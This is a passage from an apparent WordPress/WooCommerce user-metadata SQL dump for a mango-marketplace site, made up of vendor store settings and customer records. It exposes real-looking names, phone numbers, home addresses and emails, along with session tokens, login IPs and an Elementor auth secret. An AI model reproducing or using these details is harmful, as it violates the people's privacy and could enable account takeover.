product_catdiv,tagsdiv-product_tag,open-meta-box,postimagediv,woocommerce-product-images\";s:6:\"normal\";s:67:\"woocommerce-product-data,postexcerpt,postcustom,slugdiv,commentsdiv\";s:8:\"advanced\";s:0:\"\";}'),(1147,1,'screen_layout_product','2'),(1149,1,'closedpostboxes_product','a:0:{}'),(1150,1,'metaboxhidden_product','a:2:{i:0;s:10:\"postcustom\";i:1;s:7:\"slugdiv\";}'),(1153,21,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1154,21,'store_name','MainStore'),(1155,21,'wcfmmp_store_name','MainStore'),(1157,21,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:0:\"\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:0:\"\";}'),(1158,21,'total-acres-of-mango-farm-land',''),(1159,21,'varieties-of-mango-grown',''),(1160,21,'last-year-yield',''),(1161,21,'expected-yield-2022',''),(1162,21,'whatsapp-number',''),(1163,21,'any-other-contact-number',''),(1164,21,'wcemailverified','true'),(1165,21,'wcfm_subscription_status','pending'),(1168,21,'wcfmmp_profile_settings','a:51:{s:10:\"store_name\";s:9:\"MainStore\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";s:0:\"\";s:16:\"customer_support\";a:8:{s:5:\"phone\";s:0:\"\";s:5:\"email\";s:0:\"\";s:8:\"address1\";s:0:\"\";s:8:\"address2\";s:0:\"\";s:7:\"country\";s:2:\"IN\";s:4:\"city\";s:0:\"\";s:5:\"state\";s:0:\"\";s:3:\"zip\";s:0:\"\";}s:10:\"store_slug\";s:9:\"mainstore\";s:11:\"store_email\";s:19:\"bhavani@utfindia.in\";s:8:\"gravatar\";s:0:\"\";s:11:\"banner_type\";s:10:\"single_img\";s:12:\"banner_video\";s:0:\"\";s:13:\"banner_slider\";a:1:{i:0;a:2:{s:5:\"image\";s:0:\"\";s:4:\"link\";s:0:\"\";}}s:13:\"mobile_banner\";s:0:\"\";s:16:\"list_banner_type\";s:10:\"single_img\";s:11:\"list_banner\";s:0:\"\";s:17:\"list_banner_video\";s:0:\"\";s:16:\"shop_description\";s:30:\"<p><br data-mce-bogus=\"1\"></p>\";s:19:\"store_name_position\";s:9:\"on_banner\";s:9:\"store_ppp\";s:2:\"10\";s:7:\"address\";a:6:{s:8:\"street_1\";s:0:\"\";s:8:\"street_2\";s:0:\"\";s:4:\"city\";s:0:\"\";s:3:\"zip\";s:0:\"\";s:7:\"country\";s:2:\"IN\";s:5:\"state\";s:0:\"\";}s:11:\"geolocation\";a:3:{s:14:\"store_location\";s:0:\"\";s:9:\"store_lat\";s:10:\"30.0599153\";s:9:\"store_lng\";s:10:\"31.2620199\";}s:15:\"wcfmmp_shipping\";a:3:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:10:\"_wcfmmp_pt\";s:0:\"\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}s:26:\"wcfmmp_shipping_by_country\";a:6:{s:27:\"_wcfmmp_shipping_type_price\";s:0:\"\";s:26:\"_wcfmmp_additional_product\";s:0:\"\";s:22:\"_wcfmmp_additional_qty\";s:0:\"\";s:21:\"_free_shipping_amount\";s:0:\"\";s:18:\"_local_pickup_cost\";s:0:\"\";s:21:\"_wcfmmp_form_location\";s:0:\"\";}s:21:\"wcfmmp_shipping_rates\";a:1:{i:0;a:3:{s:17:\"wcfmmp_country_to\";s:0:\"\";s:23:\"wcfmmp_country_to_price\";s:1:\"0\";s:27:\"wcfmmp_shipping_state_rates\";a:1:{i:0;a:2:{s:15:\"wcfmmp_state_to\";s:0:\"\";s:21:\"wcfmmp_state_to_price\";s:1:\"0\";}}}}s:20:\"wcfmmp_shipping_zone\";a:2:{i:3;a:2:{s:8:\"_zone_id\";s:1:\"3\";s:22:\"_select_zone_postcodes\";s:0:\"\";}i:21;a:1:{s:8:\"_user_id\";s:2:\"21\";}}s:18:\"method_id_selected\";s:0:\"\";s:20:\"instance_id_selected\";s:0:\"\";s:12:\"method_title\";s:0:\"\";s:20:\"minimum_order_amount\";s:0:\"\";s:18:\"method_description\";s:0:\"\";s:11:\"method_cost\";s:0:\"\";s:17:\"method_tax_status\";s:4:\"none\";s:19:\"shipping_class_cost\";a:1:{i:0;s:0:\"\";}s:16:\"calculation_type\";s:5:\"class\";s:25:\"wcfmmp_shipping_by_weight\";a:2:{s:21:\"_free_shipping_amount\";s:3:\"500\";s:18:\"_local_pickup_cost\";s:0:\"\";}s:31:\"wcfmmp_shipping_rates_by_weight\";a:1:{i:0;a:5:{s:28:\"wcfmmp_weightwise_country_to\";s:0:\"\";s:30:\"wcfmmp_weightwise_country_mode\";s:7:\"by_rule\";s:39:\"wcfmmp_weightwise_country_per_unit_cost\";s:1:\"0\";s:38:\"wcfmmp_weightwise_country_default_cost\";s:1:\"0\";s:39:\"wcfmmp_shipping_country_weight_settings\";a:1:{i:0;a:3:{s:18:\"wcfmmp_weight_rule\";s:5:\"up_to\";s:18:\"wcfmmp_weight_unit\";s:0:\"\";s:19:\"wcfmmp_weight_price\";s:0:\"\";}}}}s:9:\"store_seo\";a:9:{s:21:\"wcfmmp-seo-meta-title\";s:0:\"\";s:20:\"wcfmmp-seo-meta-desc\";s:0:\"\";s:24:\"wcfmmp-seo-meta-keywords\";s:0:\"\";s:19:\"wcfmmp-seo-og-title\";s:0:\"\";s:18:\"wcfmmp-seo-og-desc\";s:0:\"\";s:19:\"wcfmmp-seo-og-image\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-title\";s:0:\"\";s:23:\"wcfmmp-seo-twitter-desc\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-image\";s:0:\"\";}s:10:\"wcfm_nonce\";s:10:\"b6b5d77772\";s:16:\"store_hide_email\";s:2:\"no\";s:16:\"store_hide_phone\";s:2:\"no\";s:18:\"store_hide_address\";s:2:\"no\";s:14:\"store_hide_map\";s:2:\"no\";s:22:\"store_hide_description\";s:2:\"no\";s:17:\"store_hide_policy\";s:2:\"no\";s:14:\"store_location\";s:0:\"\";s:9:\"store_lat\";s:10:\"30.0599153\";s:9:\"store_lng\";s:10:\"31.2620199\";s:13:\"method_status\";s:1:\"2\";}'),(1169,21,'_wcfmmp_shipping','a:3:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:10:\"_wcfmmp_pt\";s:0:\"\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(1170,21,'_wcfmmp_profile_id','21'),(1171,21,'_wcfmmp_unique_id','1646387776'),(1172,21,'wcfm_register_on','1646352000'),(1173,21,'_wcfmmp_avg_review_rating','0'),(1174,21,'wcfm_vendor_store_hours_migrated','yes'),(1175,21,'wcfm_register_member','yes'),(1177,21,'_store_setup','yes'),(1180,2,'_wcfm_store_offline','yes'),(1181,2,'_disable_vendor','1'),(1192,26,'nickname','nijo101196'),(1193,26,'first_name','bavani'),(1194,26,'last_name','p'),(1195,26,'description',''),(1196,26,'rich_editing','true'),(1197,26,'syntax_highlighting','true'),(1198,26,'comment_shortcuts','false'),(1199,26,'admin_color','fresh'),(1200,26,'use_ssl','0'),(1201,26,'show_admin_bar_front','true'),(1202,26,'locale',''),(1203,26,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1204,26,'wp_user_level','0'),(1205,26,'billing_phone','9353137538'),(1206,26,'aioseo_contact_methods_header',''),(1207,26,'aioseo_twitter',''),(1208,26,'aioseo_facebook',''),(1209,26,'last_update','1646645674'),(1211,26,'wc_last_active','1646870400'),(1213,26,'billing_first_name','bavani'),(1214,26,'billing_last_name','p'),(1215,26,'billing_address_1','800 ,spandana towers'),(1216,26,'billing_address_2','hsr layout'),(1217,26,'billing_city','bangalore'),(1218,26,'billing_state','KA'),(1219,26,'billing_postcode','560102'),(1220,26,'billing_country','IN'),(1221,26,'billing_email','nijo101196@gmail.com'),(1222,26,'shipping_first_name','bavani'),(1223,26,'shipping_last_name','p'),(1224,26,'shipping_address_1','800 ,spandana towers'),(1225,26,'shipping_address_2','hsr layout'),(1226,26,'shipping_city','bangalore'),(1227,26,'shipping_state','KA'),(1228,26,'shipping_postcode','560102'),(1229,26,'shipping_country','IN'),(1230,26,'shipping_method','a:2:{i:25;s:15:\"free_shipping:4\";i:21;s:11:\"flat_rate:1\";}'),(1231,26,'paying_customer','1'),(1235,26,'_previous_login','1646843429'),(1236,26,'_current_login','1646913723'),(1265,21,'_store_description','<p><br data-mce-bogus=\"1\"></p>'),(1266,21,'wcfm_seo_vendor_options','a:9:{s:21:\"wcfmmp-seo-meta-title\";s:0:\"\";s:20:\"wcfmmp-seo-meta-desc\";s:0:\"\";s:24:\"wcfmmp-seo-meta-keywords\";s:0:\"\";s:19:\"wcfmmp-seo-og-title\";s:0:\"\";s:18:\"wcfmmp-seo-og-desc\";s:0:\"\";s:19:\"wcfmmp-seo-og-image\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-title\";s:0:\"\";s:23:\"wcfmmp-seo-twitter-desc\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-image\";s:0:\"\";}'),(1267,21,'_wcfm_street_1',''),(1268,21,'_wcfm_street_2',''),(1269,21,'_wcfm_city',''),(1270,21,'_wcfm_zip',''),(1271,21,'_wcfm_country','IN'),(1272,21,'_wcfm_state',''),(1273,21,'_wcfm_store_location',''),(1274,21,'_wcfm_store_lat','30.0599153'),(1275,21,'_wcfm_store_lng','31.2620199'),(1278,25,'_store_description','<p><br></p>'),(1279,25,'wcfm_seo_vendor_options','a:9:{s:21:\"wcfmmp-seo-meta-title\";s:0:\"\";s:20:\"wcfmmp-seo-meta-desc\";s:0:\"\";s:24:\"wcfmmp-seo-meta-keywords\";s:0:\"\";s:19:\"wcfmmp-seo-og-title\";s:0:\"\";s:18:\"wcfmmp-seo-og-desc\";s:0:\"\";s:19:\"wcfmmp-seo-og-image\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-title\";s:0:\"\";s:23:\"wcfmmp-seo-twitter-desc\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-image\";s:0:\"\";}'),(1280,25,'_wcfm_street_1',''),(1281,25,'_wcfm_street_2',''),(1282,25,'_wcfm_city',''),(1283,25,'_wcfm_zip',''),(1284,25,'_wcfm_country','IN'),(1285,25,'_wcfm_state',''),(1286,25,'_wcfm_store_location',''),(1287,25,'_wcfm_store_lat','30.0599153'),(1288,25,'_wcfm_store_lng','31.2620199'),(1291,21,'_wcfm_vendor_tax_migrated','yes'),(1301,26,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:2:{s:32:\"a42a596fc71e17828440030074d15e74\";a:11:{s:3:\"key\";s:32:\"a42a596fc71e17828440030074d15e74\";s:10:\"product_id\";i:1194;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:100;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:100;s:8:\"line_tax\";i:0;}s:32:\"a3fb4fbf9a6f9cf09166aa9c20cbc1ad\";a:11:{s:3:\"key\";s:32:\"a3fb4fbf9a6f9cf09166aa9c20cbc1ad\";s:10:\"product_id\";i:1165;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:95;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:95;s:8:\"line_tax\";i:0;}}}'),(1305,21,'_wcfm_menu_toggle_state','no'),(1323,27,'nickname','rakshithasj1999'),(1324,27,'first_name',''),(1325,27,'last_name',''),(1326,27,'description',''),(1327,27,'rich_editing','true'),(1328,27,'syntax_highlighting','true'),(1329,27,'comment_shortcuts','false'),(1330,27,'admin_color','fresh'),(1331,27,'use_ssl','0'),(1332,27,'show_admin_bar_front','true'),(1333,27,'locale',''),(1334,27,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1335,27,'wp_user_level','0'),(1336,27,'billing_phone','7338610584'),(1337,27,'aioseo_contact_methods_header',''),(1338,27,'aioseo_twitter',''),(1339,27,'aioseo_facebook',''),(1340,27,'last_update','1647233930'),(1341,27,'session_tokens','a:1:{s:64:\"1edce0e59a00fa73093b32b8477dd0961079391467ea846907766f224405efdf\";a:4:{s:10:\"expiration\";i:1648443531;s:2:\"ip\";s:14:\"116.75.116.132\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36\";s:5:\"login\";i:1647233931;}}'),(1342,27,'wc_last_active','1647216000'),(1346,28,'nickname','utftech9'),(1347,28,'first_name','utftech9'),(1348,28,'last_name',''),(1349,28,'description',''),(1350,28,'rich_editing','true'),(1351,28,'syntax_highlighting','true'),(1352,28,'comment_shortcuts','false'),(1353,28,'admin_color','fresh'),(1354,28,'use_ssl','0'),(1355,28,'show_admin_bar_front',''),(1356,28,'locale',''),(1357,28,'wp_capabilities','a:1:{s:11:\"wcfm_vendor\";b:1;}'),(1358,28,'wp_user_level','6'),(1359,28,'last_update','1647328544'),(1360,28,'dismissed_wp_pointers',''),(1361,28,'store_name','utftech'),(1362,28,'wcfmmp_store_name','utftech'),(1364,28,'wcfmvm_custom_infos','a:6:{s:30:\"total-acres-of-mango-farm-land\";s:0:\"\";s:24:\"varieties-of-mango-grown\";s:0:\"\";s:15:\"last-year-yield\";s:0:\"\";s:19:\"expected-yield-2022\";s:0:\"\";s:15:\"whatsapp-number\";s:0:\"\";s:24:\"any-other-contact-number\";s:0:\"\";}'),(1365,28,'total-acres-of-mango-farm-land',''),(1366,28,'varieties-of-mango-grown',''),(1367,28,'last-year-yield',''),(1368,28,'expected-yield-2022',''),(1369,28,'whatsapp-number',''),(1370,28,'any-other-contact-number',''),(1371,28,'wcemailverified','true'),(1372,28,'wcfm_subscription_status','pending'),(1375,28,'wc_last_active','1647302400'),(1377,28,'wcfmmp_profile_settings','a:47:{s:10:\"store_name\";s:7:\"utftech\";s:6:\"social\";a:0:{}s:7:\"payment\";a:0:{}s:5:\"phone\";s:0:\"\";s:10:\"show_email\";s:2:\"no\";s:8:\"location\";s:0:\"\";s:12:\"find_address\";s:0:\"\";s:6:\"banner\";s:0:\"\";s:16:\"customer_support\";a:8:{s:5:\"phone\";s:0:\"\";s:5:\"email\";s:0:\"\";s:8:\"address1\";s:0:\"\";s:8:\"address2\";s:0:\"\";s:7:\"country\";s:2:\"IN\";s:4:\"city\";s:0:\"\";s:5:\"state\";s:0:\"\";s:3:\"zip\";s:0:\"\";}s:10:\"store_slug\";s:7:\"utftech\";s:11:\"store_email\";s:18:\"utftech9@gmail.com\";s:8:\"gravatar\";s:0:\"\";s:11:\"banner_type\";s:10:\"single_img\";s:12:\"banner_video\";s:0:\"\";s:13:\"banner_slider\";a:1:{i:0;a:2:{s:5:\"image\";s:0:\"\";s:4:\"link\";s:0:\"\";}}s:13:\"mobile_banner\";s:0:\"\";s:16:\"list_banner_type\";s:10:\"single_img\";s:11:\"list_banner\";s:0:\"\";s:17:\"list_banner_video\";s:0:\"\";s:16:\"shop_description\";s:30:\"<p><br data-mce-bogus=\"1\"></p>\";s:19:\"store_name_position\";s:9:\"on_banner\";s:9:\"store_ppp\";s:2:\"10\";s:7:\"address\";a:6:{s:8:\"street_1\";s:0:\"\";s:8:\"street_2\";s:0:\"\";s:4:\"city\";s:0:\"\";s:3:\"zip\";s:0:\"\";s:7:\"country\";s:2:\"IN\";s:5:\"state\";s:0:\"\";}s:15:\"wcfmmp_shipping\";a:3:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:10:\"_wcfmmp_pt\";s:0:\"\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}s:26:\"wcfmmp_shipping_by_country\";a:6:{s:27:\"_wcfmmp_shipping_type_price\";s:0:\"\";s:26:\"_wcfmmp_additional_product\";s:0:\"\";s:22:\"_wcfmmp_additional_qty\";s:0:\"\";s:21:\"_free_shipping_amount\";s:0:\"\";s:18:\"_local_pickup_cost\";s:0:\"\";s:21:\"_wcfmmp_form_location\";s:0:\"\";}s:21:\"wcfmmp_shipping_rates\";a:1:{i:0;a:3:{s:17:\"wcfmmp_country_to\";s:0:\"\";s:23:\"wcfmmp_country_to_price\";s:1:\"0\";s:27:\"wcfmmp_shipping_state_rates\";a:1:{i:0;a:2:{s:15:\"wcfmmp_state_to\";s:0:\"\";s:21:\"wcfmmp_state_to_price\";s:1:\"0\";}}}}s:20:\"wcfmmp_shipping_zone\";a:2:{i:3;a:2:{s:8:\"_zone_id\";s:1:\"3\";s:22:\"_select_zone_postcodes\";s:0:\"\";}i:28;a:1:{s:8:\"_user_id\";s:2:\"28\";}}s:18:\"method_id_selected\";s:0:\"\";s:20:\"instance_id_selected\";s:0:\"\";s:12:\"method_title\";s:0:\"\";s:20:\"minimum_order_amount\";s:0:\"\";s:18:\"method_description\";s:0:\"\";s:11:\"method_cost\";s:0:\"\";s:17:\"method_tax_status\";s:4:\"none\";s:19:\"shipping_class_cost\";a:1:{i:0;s:0:\"\";}s:16:\"calculation_type\";s:5:\"class\";s:25:\"wcfmmp_shipping_by_weight\";a:2:{s:21:\"_free_shipping_amount\";s:3:\"500\";s:18:\"_local_pickup_cost\";s:0:\"\";}s:31:\"wcfmmp_shipping_rates_by_weight\";a:1:{i:0;a:5:{s:28:\"wcfmmp_weightwise_country_to\";s:0:\"\";s:30:\"wcfmmp_weightwise_country_mode\";s:7:\"by_rule\";s:39:\"wcfmmp_weightwise_country_per_unit_cost\";s:1:\"0\";s:38:\"wcfmmp_weightwise_country_default_cost\";s:1:\"0\";s:39:\"wcfmmp_shipping_country_weight_settings\";a:1:{i:0;a:3:{s:18:\"wcfmmp_weight_rule\";s:5:\"up_to\";s:18:\"wcfmmp_weight_unit\";s:0:\"\";s:19:\"wcfmmp_weight_price\";s:0:\"\";}}}}s:9:\"store_seo\";a:9:{s:21:\"wcfmmp-seo-meta-title\";s:0:\"\";s:20:\"wcfmmp-seo-meta-desc\";s:0:\"\";s:24:\"wcfmmp-seo-meta-keywords\";s:0:\"\";s:19:\"wcfmmp-seo-og-title\";s:0:\"\";s:18:\"wcfmmp-seo-og-desc\";s:0:\"\";s:19:\"wcfmmp-seo-og-image\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-title\";s:0:\"\";s:23:\"wcfmmp-seo-twitter-desc\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-image\";s:0:\"\";}s:10:\"wcfm_nonce\";s:10:\"df6b1968d4\";s:16:\"store_hide_email\";s:2:\"no\";s:16:\"store_hide_phone\";s:2:\"no\";s:18:\"store_hide_address\";s:2:\"no\";s:14:\"store_hide_map\";s:2:\"no\";s:22:\"store_hide_description\";s:2:\"no\";s:17:\"store_hide_policy\";s:2:\"no\";s:13:\"method_status\";s:1:\"5\";}'),(1378,28,'_wcfmmp_shipping','a:3:{s:28:\"_wcfmmp_user_shipping_enable\";s:3:\"yes\";s:10:\"_wcfmmp_pt\";s:0:\"\";s:26:\"_wcfmmp_user_shipping_type\";s:7:\"by_zone\";}'),(1379,28,'_wcfmmp_profile_id','28'),(1380,28,'_wcfmmp_unique_id','1647348709'),(1381,28,'wcfm_register_on','1647302400'),(1382,28,'_wcfmmp_avg_review_rating','0'),(1383,28,'wcfm_vendor_store_hours_migrated','yes'),(1384,28,'wcfm_register_member','yes'),(1385,28,'_store_setup','yes'),(1388,28,'_previous_login',''),(1389,28,'_current_login','1647348886'),(1390,28,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1391,29,'nickname','utfhr.333'),(1392,29,'first_name','pavithra'),(1393,29,'last_name','g'),(1394,29,'description',''),(1395,29,'rich_editing','true'),(1396,29,'syntax_highlighting','true'),(1397,29,'comment_shortcuts','false'),(1398,29,'admin_color','fresh'),(1399,29,'use_ssl','0'),(1400,29,'show_admin_bar_front','true'),(1401,29,'locale',''),(1402,29,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1403,29,'wp_user_level','0'),(1404,29,'billing_phone','07411722844'),(1405,29,'last_update','1647331358'),(1406,29,'session_tokens','a:1:{s:64:\"2095ae52db863f91289368d62847c2867e6eb22027495c73f31e6089a3ad62be\";a:4:{s:10:\"expiration\";i:1648539634;s:2:\"ip\";s:14:\"116.75.127.237\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36\";s:5:\"login\";i:1647330034;}}'),(1407,29,'wc_last_active','1647302400'),(1409,28,'_store_description','<p><br data-mce-bogus=\"1\"></p>'),(1410,28,'wcfm_seo_vendor_options','a:9:{s:21:\"wcfmmp-seo-meta-title\";s:0:\"\";s:20:\"wcfmmp-seo-meta-desc\";s:0:\"\";s:24:\"wcfmmp-seo-meta-keywords\";s:0:\"\";s:19:\"wcfmmp-seo-og-title\";s:0:\"\";s:18:\"wcfmmp-seo-og-desc\";s:0:\"\";s:19:\"wcfmmp-seo-og-image\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-title\";s:0:\"\";s:23:\"wcfmmp-seo-twitter-desc\";s:0:\"\";s:24:\"wcfmmp-seo-twitter-image\";s:0:\"\";}'),(1411,28,'_wcfm_street_1',''),(1412,28,'_wcfm_street_2',''),(1413,28,'_wcfm_city',''),(1414,28,'_wcfm_zip',''),(1415,28,'_wcfm_country','IN'),(1416,28,'_wcfm_state',''),(1417,29,'billing_first_name','pavithra'),(1418,29,'billing_last_name','g'),(1419,29,'billing_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(1420,29,'billing_address_2','near golden fresh super market'),(1421,29,'billing_city','bangalore'),(1422,29,'billing_state','KA'),(1423,29,'billing_postcode','560102'),(1424,29,'billing_country','IN'),(1425,29,'billing_email','utfhr.333@gmail.com'),(1426,29,'shipping_first_name','pavithra'),(1427,29,'shipping_last_name','g'),(1428,29,'shipping_address_1','#800 Spandana towers , 19th main road .hsr layout 2nd sector'),(1429,29,'shipping_address_2','near golden fresh super market'),(1430,29,'shipping_city','bangalore'),(1431,29,'shipping_state','KA'),(1432,29,'shipping_postcode','560102'),(1433,29,'shipping_country','IN'),(1434,29,'shipping_method','a:1:{i:25;s:11:\"flat_rate:3\";}'),(1435,29,'paying_customer','1'),(1437,25,'session_tokens','a:1:{s:64:\"9602ace742adf31878f8bc4a0b62d74344174db5afa00c454aa1394f57aaea2c\";a:4:{s:10:\"expiration\";i:1647503467;s:2:\"ip\";s:14:\"122.167.111.85\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36\";s:5:\"login\";i:1647330667;}}'),(1449,25,'_wcfm_vendor_tax_migrated','yes'),(1454,30,'nickname','pavvitra'),(1455,30,'first_name',''),(1456,30,'last_name',''),(1457,30,'description',''),(1458,30,'rich_editing','true'),(1459,30,'syntax_highlighting','true'),(1460,30,'comment_shortcuts','false'),(1461,30,'admin_color','fresh'),(1462,30,'use_ssl','0'),(1463,30,'show_admin_bar_front','true'),(1464,30,'locale',''),(1465,30,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1466,30,'wp_user_level','0'),(1467,30,'billing_phone','7411722846'),(1468,30,'last_update','1647618966'),(1469,30,'session_tokens','a:1:{s:64:\"4897f060ae857d695477643690c7447c0256a23334353dc33f65bd1a00f66089\";a:4:{s:10:\"expiration\";i:1648828568;s:2:\"ip\";s:13:\"157.45.154.87\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36\";s:5:\"login\";i:1647618968;}}'),(1470,30,'wc_last_active','1647561600'),(1569,5,'session_tokens','a:1:{s:64:\"d45246a0eb5462c641d135cb3bd1b79c9902967619bc46d415d3dfbe2a2859de\";a:4:{s:10:\"expiration\";i:1729066589;s:2:\"ip\";s:15:\"185.241.208.250\";s:2:\"ua\";s:11:\"Mozilla/5.0\";s:5:\"login\";i:1728893789;}}'),(1630,5,'_woocommerce_load_saved_cart_after_login','1'),(1641,1,'wp_elementor_connect_common_data','a:3:{s:9:\"client_id\";s:32:\"L2LTHEZO9oex4iD2drcP4dLhKGxgKtGW\";s:11:\"auth_secret\";s:32:\"Dby4fTPivUOT864M91y7e4tAZBN9kDIf\";s:5:\"state\";s:12:\"jiL9uvTpJoDH\";}'),(1664,1,'marketing_optin','subscribed'),(1673,1,'wp_tablepress_user_options','{\"user_options_db_version\":59,\"admin_menu_parent_page\":\"middle\",\"message_first_visit\":true,\"table_editor_column_width\":\"170\",\"table_editor_line_clamp\":\"5\"}'),(1674,1,'closedpostboxes_tablepress_edit','a:0:{}'),(1675,1,'metaboxhidden_tablepress_edit','a:0:{}'),(1677,1,'managetablepress_listcolumnshidden','a:1:{i:0;s:22:\"table_last_modified_by\";}'),(1683,1,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(1708,1,'wp_persisted_preferences','a:2:{s:14:\"core/edit-post\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2023-03-28T05:40:14.379Z\";}'),(1710,31,'nickname','nimya'),(1711,31,'first_name','nimya'),(1712,31,'last_name','jose'),(1713,31,'description',''),(1714,31,'rich_editing','true'),(1715,31,'syntax_highlighting','true'),(1716,31,'comment_shortcuts','false'),(1717,31,'admin_color','fresh'),(1718,31,'use_ssl','0'),(1719,31,'show_admin_bar_front','true'),(1720,31,'locale',''),(1721,31,'wp_capabilities','a:2:{s:22:\"armember_access_plan_1\";b:1;s:8:\"armember\";b:1;}'),(1722,31,'wp_user_level','0'),(1723,31,'dismissed_wp_pointers',''),(1724,31,'last_update','1679988636'),(1725,31,'arm_primary_status','1'),(1726,31,'arm_secondary_status','0'),(1727,31,'arm_user_plan_1','a:25:{s:23:\"arm_current_plan_detail\";a:13:{s:24:\"arm_subscription_plan_id\";s:1:\"1\";s:26:\"arm_subscription_plan_name\";s:15:\"Free Membership\";s:33:\"arm_subscription_plan_description\";s:29:\"This is Free Membership Plan.\";s:26:\"arm_subscription_plan_type\";s:4:\"free\";s:29:\"arm_subscription_plan_options\";s:45:\"a:1:{s:9:\"pricetext\";s:15:\"Free Membership\";}\";s:28:\"arm_subscription_plan_amount\";s:1:\"0\";s:28:\"arm_subscription_plan_status\";s:1:\"1\";s:26:\"arm_subscription_plan_role\";s:8:\"armember\";s:29:\"arm_subscription_plan_post_id\";s:1:\"0\";s:33:\"arm_subscription_plan_gift_status\";s:1:\"0\";s:31:\"arm_subscription_plan_is_delete\";s:1:\"0\";s:34:\"arm_subscription_plan_created_date\";s:19:\"2023-03-28 07:20:22\";s:31:\"arm_user_selected_payment_cycle\";s:0:\"\";}s:14:\"arm_start_plan\";i:1680008492;s:15:\"arm_expire_plan\";s:0:\"\";s:17:\"arm_is_trial_plan\";i:0;s:15:\"arm_trial_start\";s:0:\"\";s:13:\"arm_trial_end\";s:0:\"\";s:16:\"arm_payment_mode\";s:0:\"\";s:17:\"arm_payment_cycle\";s:0:\"\";s:20:\"arm_is_user_in_grace\";i:0;s:20:\"arm_grace_period_end\";s:0:\"\";s:23:\"arm_grace_period_action\";s:0:\"\";s:20:\"arm_subscr_effective\";s:0:\"\";s:18:\"arm_change_plan_to\";s:0:\"\";s:16:\"arm_user_gateway\";s:6:\"manual\";s:13:\"arm_subscr_id\";s:0:\"\";s:20:\"arm_next_due_payment\";s:0:\"\";s:23:\"arm_completed_recurring\";s:0:\"\";s:13:\"arm_sent_msgs\";s:0:\"\";s:18:\"arm_cencelled_plan\";s:0:\"\";s:17:\"arm_authorize_net\";a:0:{}s:13:\"arm_2checkout\";a:0:{}s:10:\"arm_stripe\";a:0:{}s:10:\"arm_paypal\";a:0:{}s:14:\"payment_detail\";a:0:{}s:21:\"arm_started_plan_date\";s:0:\"\";}'),(1728,31,'form_random_key','1_eF51KQUgHw'),(1729,31,'setup_id','1'),(1730,31,'referral_url','https://s10333402.saturnwp.link/aboutus/'),(1731,31,'arm_form_id','101'),(1732,31,'arm_nonce_check','5097d8f07f'),(1733,31,'8r9rn644',''),(1734,31,'arm_entry_id','0'),(1735,31,'arm_user_plan_ids','a:1:{i:0;s:1:\"1\";}'),(1736,31,'arm_user_last_plan','1'),(1737,31,'arm_user_future_plan_ids','a:0:{}'),(1738,31,'roles','armember'),(1740,31,'arm_last_login_date','2023-03-28 